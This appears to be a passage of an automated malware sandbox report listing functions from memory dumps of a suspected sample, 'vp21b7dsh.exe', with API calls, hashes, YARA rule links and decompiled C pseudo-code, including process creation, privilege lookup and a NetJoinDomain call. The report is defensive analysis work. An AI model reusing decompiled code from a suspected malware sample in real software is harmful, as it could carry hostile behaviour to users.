Function 00BC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC954A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f98a9ca4b4375cc558ed879cc446345f19d5d8d7a495d69a057fe54f7da068c7
Instruction ID: 5fbe54261e188be3232b6ed5544bb5bdd7ba9b377264ad914d932b2477ff3097
Opcode Fuzzy Hash: f98a9ca4b4375cc558ed879cc446345f19d5d8d7a495d69a057fe54f7da068c7
Instruction Fuzzy Hash: 43900266261000030205A55907045074086D7D5391755C076F1405560CE6618871A161

Uniqueness

Uniqueness Score: -1.00%

Function 00BC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC96EA

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e69524928857ee67ea1b9a89dfc66fcc66a7b23c5f497920501ecfa22f499b6f
Instruction ID: 1109f809e7b2c349c2f1a2f61e59547191ae036c5a75391cdd65e65c8e3c2d04
Opcode Fuzzy Hash: e69524928857ee67ea1b9a89dfc66fcc66a7b23c5f497920501ecfa22f499b6f
Instruction Fuzzy Hash: 0390027225108802D2106159840474A4045D7D0341F59C466A4814668D96D588A1B161

Uniqueness

Uniqueness Score: -1.00%

Function 00BC96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC96DA

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78bf0e9f7961ad3d166fa1ed68601a417fdf414cd4424faa56ac7a16710c8dc7
Instruction ID: 355f0ef7200eefe8b99eb9b8e8890c00878609291148b94fa9e2e9cc7461d35c
Opcode Fuzzy Hash: 78bf0e9f7961ad3d166fa1ed68601a417fdf414cd4424faa56ac7a16710c8dc7
Instruction Fuzzy Hash: ED90027225100842D20061594404B464045D7E0341F55C06BA0514664D9655C861B561

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC978A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2f07f1676dc98c4d8639222e69ea10bebac4b791d4526f020b6b2371f383d09
Instruction ID: bfa249105d42580859eb385f6562c14a53dec4530ab02bf7cab328a3df7c9734
Opcode Fuzzy Hash: e2f07f1676dc98c4d8639222e69ea10bebac4b791d4526f020b6b2371f383d09
Instruction Fuzzy Hash: B190026A26300002D2807159540860A4045D7D1342F95D46AA0405568CD9558879A361

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC9FEA

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d6b893854a01170f0732319377cf2371032c9a885690af45542467a6627176e
Instruction ID: 6ea0df29ab20a47736aa62ace6a10592b1fe2789482212d3886d3a3a715e869d
Opcode Fuzzy Hash: 4d6b893854a01170f0732319377cf2371032c9a885690af45542467a6627176e
Instruction Fuzzy Hash: 8990027236114402D210615984047064045D7D1341F55C466A0C14568D96D588A1B162

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC971A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f60002670f0fb381f8444c8594acc010e403f6e6e73b550a300f4c452e307b0
Instruction ID: d39d9d0b39fe3bf6294c45ca014a3e90c1e452e5885680dac5f0ae963171a55f
Opcode Fuzzy Hash: 1f60002670f0fb381f8444c8594acc010e403f6e6e73b550a300f4c452e307b0
Instruction Fuzzy Hash: A590027225100402D200659954086464045D7E0341F55D066A5414565ED6A588A1B171

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9770, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC977A

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b3a2c45ff70718b1cd94864879fb3e07fef5305113ced95c6b5415b71a1835f
Instruction ID: 682cdd837f26ffefb7835247d527d31ce14c6c952ec23ea33a349729c663254e
Opcode Fuzzy Hash: 3b3a2c45ff70718b1cd94864879fb3e07fef5305113ced95c6b5415b71a1835f
Instruction Fuzzy Hash: D890026225504442D20065595408A064045D7D0345F55D066A14545A5DD6758861F171

Uniqueness

Uniqueness Score: -1.00%

Function 00169B52, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153AE8), ref: 00169B8D

Strings

.z`, xrefs: 00169B7C, 00169B88

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 3432f20ab6b5186f5a088fba280abbd77d16f4f9476217ae9a098b656d161deb
Instruction ID: 5302c6c0c76fb5f86504a1e105cbd9b241d86bee16f1101deafdb4d32fab4364
Opcode Fuzzy Hash: 3432f20ab6b5186f5a088fba280abbd77d16f4f9476217ae9a098b656d161deb
Instruction Fuzzy Hash: 01F0A971200204ABDB18DF68CC58EEB3768EF88380F014658FE4CA7242D632A810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00169B60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153AE8), ref: 00169B8D

Strings

.z`, xrefs: 00169B7C, 00169B88

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 93afb1f7c0cb5fd20a1c5783719a5b0f60dfcb2fda9f85aa5602f6210336a928
Instruction ID: ba130ae11b6fdcb8a6c065ac6047e8acffda8e3be04a9a24c6907c7b749a9531
Opcode Fuzzy Hash: 93afb1f7c0cb5fd20a1c5783719a5b0f60dfcb2fda9f85aa5602f6210336a928
Instruction Fuzzy Hash: 80E046B1210208ABDB18EF99CC49EA777ACEF88750F018558FE086B242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0016286B, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00153A0A,00000000), ref: 00162887

Strings

@J7<, xrefs: 0016289B

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 6db5a92cbe3cee5a046a41702ee415a521d8ecc11a2351e82a5934bd5e1c8bfa
Instruction ID: 4d5290ef197e891ab60519b6b67e72eb1c2c896a4271bd2c285fa76a22dad1b6
Opcode Fuzzy Hash: 6db5a92cbe3cee5a046a41702ee415a521d8ecc11a2351e82a5934bd5e1c8bfa
Instruction Fuzzy Hash: A1314DB6A0061A9FDB10DFD8CC809EEB7B9FF88304F108559E515EB254D771AE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00162870, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00153A0A,00000000), ref: 00162887

Strings

@J7<, xrefs: 0016289B

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 35014aa2321803c52a0aed3bbb4dbbc134b6bdb105065e4742bf8893699e5cbb
Instruction ID: e4582277c77de6f65f184682222cc3bef87312d019055c84a091cbd8035ad23f
Opcode Fuzzy Hash: 35014aa2321803c52a0aed3bbb4dbbc134b6bdb105065e4742bf8893699e5cbb
Instruction Fuzzy Hash: F5311CB6A0061AAFDB10DFD8CC809EEB7B9BF88304F108559E515EB214D775AE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001582B0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0015830A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0015832B

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 1e4f35da751bf9c053d92e0267ba8dd410b60475e7615897ba7d60eeba4c57b1
Instruction ID: 3e28274e7abdd1296af3725da4a6d2f9e1f0bd1e127e00a6b690ee3108020118
Opcode Fuzzy Hash: 1e4f35da751bf9c053d92e0267ba8dd410b60475e7615897ba7d60eeba4c57b1
Instruction Fuzzy Hash: 04018431A80228BBE721A6949C43FBE776CAB50F51F440118FF04BA1C2EB94691946E6

Uniqueness

Uniqueness Score: -1.00%

Function 0015AE10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0015AE82

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8f90d9009738eb04470c7b551506a245642ae7c8f47aee6e4f8e1c18cbe2af74
Instruction ID: 795d41a306ff234e82225fbe784587841e0d6d9ba5f043dbdc7cafe15ddaa9b4
Opcode Fuzzy Hash: 8f90d9009738eb04470c7b551506a245642ae7c8f47aee6e4f8e1c18cbe2af74
Instruction Fuzzy Hash: 5B010CB5E4020DABDB10DAE4DC82F9EB7789F54308F004295AD19AB241F731EA588B92

Uniqueness

Uniqueness Score: -1.00%

Function 00169BD0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00169C24

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: cab65f9190f5396bf955a0407ab85306c6e3c31abd9f0557688dc9eec4353d77
Instruction ID: 1218259f82cb35b182918f5180760cd57ede61a7bf5b97bc1666422b02aa80fe
Opcode Fuzzy Hash: cab65f9190f5396bf955a0407ab85306c6e3c31abd9f0557688dc9eec4353d77
Instruction Fuzzy Hash: 6001AFB2210108ABCB54DF89DC80EEB77ADAF8C754F558258BA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00169BCF, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00169C24

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 2c9372f899a5958de2732067b9bbc037cc1f8e72cbe374c0550d4a55edc5ef57
Instruction ID: 807a1b3b3abb236b87e86125f7542d5c0cbe9100a8608bbb1cb547fa8a8116df
Opcode Fuzzy Hash: 2c9372f899a5958de2732067b9bbc037cc1f8e72cbe374c0550d4a55edc5ef57
Instruction Fuzzy Hash: D201ABB2214108ABCB58DF89DC81EEB37ADAF8C754F558258BA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00169CC0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0015F2E2,0015F2E2,?,00000000,?,?), ref: 00169CF0

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9a17de159ed314920e088fc84b01ffc735794c57dbb78fbb83f992607dce854a
Instruction ID: ca7cdde1059f53ae58995b90c918f27358a885687034b67fadf4090a6ab053ef
Opcode Fuzzy Hash: 9a17de159ed314920e088fc84b01ffc735794c57dbb78fbb83f992607dce854a
Instruction Fuzzy Hash: E4E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BE0867241CA30E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0015F7D7, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,00158CB4,?), ref: 0015F80B

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 293da762849480f72a356505bd69c1465ea5e4796910ae4b9519fe8f5a07e17f
Instruction ID: d510855c5b5d6b41989b55682cf1ada28ed66fde8ab77a6813cf8fbcb55d69bf
Opcode Fuzzy Hash: 293da762849480f72a356505bd69c1465ea5e4796910ae4b9519fe8f5a07e17f
Instruction Fuzzy Hash: DAE0C2E25783802EEB10FB746C06B423F480702314F1944AAE94CEF0C7D95880188225

Uniqueness

Uniqueness Score: -1.00%

Function 0015F7E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,00158CB4,?), ref: 0015F80B

Memory Dump Source

Source File: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5b6083147236b566ef5f60c4241a76d62d28b3fab68233cec3bf6663036e4af6
Instruction ID: 0ae09c15f0cfc387f531d530a8e06dd22b5b018624332d1342314f66b87dbdc7
Opcode Fuzzy Hash: 5b6083147236b566ef5f60c4241a76d62d28b3fab68233cec3bf6663036e4af6
Instruction Fuzzy Hash: A4D0A7767503087BE610FAA89C03F2632CC5B55B00F590074F949DB3C7DE50F4014161

Uniqueness

Uniqueness Score: -1.00%

Function 00BC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00BC9694

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f8886ef3963531fa287d2e9c0232e1325a41c854095f36b107d210f28f099b97
Instruction ID: c9bbfb06088726fc56a6e44ac06294ddc0b79786d4ce2e994e0c4d13ca6d18b6
Opcode Fuzzy Hash: f8886ef3963531fa287d2e9c0232e1325a41c854095f36b107d210f28f099b97
Instruction Fuzzy Hash: E0B09B729414C5C5E711D760460CB177940F7D0741F16C0B6D1420655A4778C4A1F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00C1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00BCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00C15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00C15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00c1fdda
0x00c1fde2
0x00c1fde5
0x00c1fdec
0x00c1fdfa
0x00c1fdff
0x00c1fe0a
0x00c1fe0f
0x00c1fe17
0x00c1fe1e
0x00c1fe19
0x00c1fe19
0x00c1fe19
0x00c1fe20
0x00c1fe21
0x00c1fe22
0x00c1fe25
0x00c1fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C1FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C1FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C1FE01

Memory Dump Source

Source File: 0000000A.00000002.921345121.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true

Associated: 0000000A.00000002.921570227.0000000000C7B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: bf73135a77de30af27919ae459b85d3da89729e42b9c29ef185342976ad38531
Instruction ID: 0580a5245dc367e63143724c2570830186a9ba557ab5566ca67881ee1dc8d972
Opcode Fuzzy Hash: bf73135a77de30af27919ae459b85d3da89729e42b9c29ef185342976ad38531
Instruction Fuzzy Hash: B9F0F632200601BFE6251A55DC03F63BF9BEB86730F244358F628561E1DA62F8A0A6F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vp21b7dsh.exe PID: 2188 Parent PID: 3424 vp21b7dsh.exeCOMMON

Executed Functions

Function 00F116C3, Relevance: 10.6, APIs: 7, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00F116C3() {
				intOrPtr _t10;
				int _t11;
				intOrPtr _t15;
				void* _t19;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				intOrPtr* _t33;
				void* _t35;

				_push(0x10);
				_push(0xf11de0);
				E00F11BB8(_t19, _t28, _t30);
				 *((intOrPtr*)(_t35 - 4)) = 0;
				_t31 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t29 = 0;
				while(1) {
					_t21 = _t31;
					_t10 = 0;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t31) {
						Sleep(0x3e8);
						continue;
					} else {
						_t33 = 1;
						_t29 = 1;
					}
					L6:
					if( *0xf12368 != _t33) {
						__eflags =  *0xf12368;
						if(__eflags != 0) {
							 *0xf12014 = _t33;
							goto L12;
						} else {
							 *0xf12368 = _t33;
							_t10 = E00F11832(_t21, 0xf110b4, 0xf110c0); // executed
							_pop(_t21);
							__eflags = _t10;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t35 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						L00F119A4();
						_t21 = 0x1f;
						L12:
						if( *0xf12368 == _t33) {
							_push(0xf110b0);
							L00F11BB0();
							_t21 = 0xf110a8;
							 *0xf12368 = 2;
						}
						if(_t29 == 0) {
							_t21 = 0xf12364;
							_t10 =  *0xf12364;
							 *0xf12364 = 0;
						}
						_t45 =  *0xf1236c;
						if( *0xf1236c != 0) {
							_t10 = E00F11A10(_t45, 0xf1236c);
							_pop(_t21);
							if(_t10 != 0) {
								_t33 =  *0xf1236c;
								_t21 = _t33;
								 *0xf130a8(0, 2, 0);
								_t10 =  *_t33();
							}
						}
						_push( *0xf12020);
						_push( *0xf1201c);
						_push( *0xf12018);
						_t11 = E00F1146F(_t10, _t21);
						 *0xf12010 = _t11;
						if( *0xf12028 != 0) {
							__eflags =  *0xf12014;
							if( *0xf12014 == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t35 - 4)) = 0xfffffffe;
							L24:
							return E00F11C00(0, _t29, _t33);
						} else {
							exit(_t11); // executed
							_t22 =  *((intOrPtr*)(_t35 - 0x14));
							_t15 =  *((intOrPtr*)( *_t22));
							 *((intOrPtr*)(_t35 - 0x20)) = _t15;
							_push(_t22);
							_push(_t15);
							L00F118FE();
							return _t15;
						}
					}
				}
				_t33 = 1;
				__eflags = 1;
				goto L6;
			}

0x00f116c3
0x00f116c5
0x00f116ca
0x00f116d1
0x00f116da
0x00f116dd
0x00f116df
0x00f116e4
0x00f116e6
0x00f116e8
0x00f116ee
0x00000000
0x00000000
0x00f116f2
0x00f11700
0x00000000
0x00f116f4
0x00f116f6
0x00f116f7
0x00f116f7
0x00f1170b
0x00f11711
0x00f1171d
0x00f11723
0x00f11751
0x00000000
0x00f11725
0x00f11725
0x00f11735
0x00f1173b
0x00f1173c
0x00f1173e
0x00000000
0x00f11740
0x00f11740
0x00000000
0x00f11747
0x00f1173e
0x00f11713
0x00f11715
0x00f1171a
0x00f11757
0x00f1175d
0x00f1175f
0x00f11769
0x00f1176f
0x00f11770
0x00f11770
0x00f1177c
0x00f11780
0x00f11785
0x00f11785
0x00f11785
0x00f11787
0x00f1178e
0x00f11795
0x00f1179a
0x00f1179d
0x00f117a3
0x00f117a9
0x00f117ab
0x00f117b1
0x00f117b1
0x00f1179d
0x00f117b3
0x00f117b9
0x00f117bf
0x00f117c5
0x00f117cd
0x00f117d9
0x00f11811
0x00f11818
0x00f1181a
0x00f11820
0x00f11825
0x00f1182c
0x00f11831
0x00f117db
0x00f117dc
0x00f117e2
0x00f117e7
0x00f117e9
0x00f117ec
0x00f117ed
0x00f117ee
0x00f117f5
0x00f117f5
0x00f117d9
0x00f11711
0x00f1170a
0x00f1170a
0x00000000

APIs

Sleep.KERNEL32(000003E8,00F11DE0,00000010), ref: 00F11700
_amsg_exit.MSVCRT ref: 00F11715
_initterm.MSVCRT ref: 00F11769
__IsNonwritableInCurrentImage.LIBCMT ref: 00F11795
exit.KERNELBASE ref: 00F117DC
_XcptFilter.MSVCRT ref: 00F117EE

Memory Dump Source

Source File: 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000015.00000002.904386841.0000000000F10000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.904412388.0000000000F13000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
String ID:
API String ID: 796493780-0
Opcode ID: 7724428f353c3e89145939774930e6b89bbf799a10b45049b00b14e142a2debc
Instruction ID: cd2928e6410a851d967debdeb3e3435073662f0706dd208e7c32ed050fc20c87
Opcode Fuzzy Hash: 7724428f353c3e89145939774930e6b89bbf799a10b45049b00b14e142a2debc
Instruction Fuzzy Hash: 2731C175E40318DFEB659BA4EC457E836A4BB0CB30F228129E711972E0CB348AD0FB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F1146F, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 78
nativesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00F1146F(void* __eax, void* __ecx) {
				void* _v8;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v11471807;
				intOrPtr _t20;
				long _t23;
				long _t26;
				long _t37;

				_push(L"\\SAM_SERVICE_STARTED");
				asm("int1");
				_v11471807 = _v11471807 + __ecx;
				asm("adc eax, 0xf1308c");
				_t3 =  &_v16; // 0x11e4a
				_t20 = _t3;
				asm("hlt");
				_v40 = 0x18;
				_v32 = _t20;
				_t6 =  &_v40; // 0x11e32
				_v36 = 0;
				_v28 = 0;
				_t9 =  &_v8; // 0x11e52
				_v24 = 0;
				_v20 = 0;
				_t23 = NtOpenEvent(_t9, 0x100002, _t6);
				if(_t23 >= 0) {
					L9:
					_t37 = WaitForSingleObject(_v8, 0x493e0);
					NtClose(_v8);
					if(_t37 == 0) {
						_t26 = E00F11420();
						if(_t26 == 0) {
							if(E00F11547() == 0) {
								__imp__NetJoinDomain(0, L"WORKGROUP", 0, L"Administrator", 0xf11154, 0);
							}
							goto L14;
						}
					} else {
						_t26 = _t37;
					}
				} else {
					if(_t23 == 0xc0000034) {
						_t12 =  &_v40; // 0x11e32
						_t13 =  &_v8; // 0x11e52
						_t23 = NtCreateEvent(_t13, 0x100002, _t12, 0, 0);
						if(_t23 == 0x40000000 || _t23 == 0xc0000035) {
							_t14 =  &_v40; // 0x11e32
							_t15 =  &_v8; // 0x11e52
							_t23 = NtOpenEvent(_t15, 0x100002, _t14);
						}
					}
					if(_t23 < 0) {
						L14:
						_t26 = 0;
					} else {
						goto L9;
					}
				}
				return _t26;
			}

0x00f11479
0x00f1147c
0x00f1147d
0x00f11483
0x00f11488
0x00f11488
0x00f1148a
0x00f1148b
0x00f11492
0x00f11497
0x00f1149a
0x00f114a3
0x00f114a7
0x00f114aa
0x00f114ae
0x00f114b1
0x00f114b9
0x00f114f4
0x00f11505
0x00f11507
0x00f1150f
0x00f11515
0x00f1151c
0x00f11525
0x00f11539
0x00f11539
0x00000000
0x00f11525
0x00f11511
0x00f11511
0x00f11511
0x00f114bb
0x00f114c0
0x00f114c4
0x00f114c9
0x00f114cd
0x00f114d8
0x00f114e1
0x00f114e6
0x00f114ea
0x00f114ea
0x00f114d8
0x00f114f2
0x00f1153f
0x00f1153f
0x00000000
0x00000000
0x00000000
0x00f114f2
0x00f11546

APIs

RtlInitUnicodeString.NTDLL ref: 00F11482
NtOpenEvent.NTDLL(?,00100002,00000018), ref: 00F114B1
NtCreateEvent.NTDLL(?,00100002,00000018,00000000,00000000), ref: 00F114CD
NtOpenEvent.NTDLL(?,00100002,00000018), ref: 00F114EA
WaitForSingleObject.KERNEL32(?,000493E0), ref: 00F114FC
NtClose.NTDLL(?), ref: 00F11507
NetJoinDomain.WKSCLI(00000000,WORKGROUP,00000000,Administrator,00F11154,00000000), ref: 00F11539

Strings

\SAM_SERVICE_STARTED, xrefs: 00F11479
WORKGROUP, xrefs: 00F11533
Administrator, xrefs: 00F1152D

Memory Dump Source

Source File: 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000015.00000002.904386841.0000000000F10000.00000002.00020000.sdmp Download File
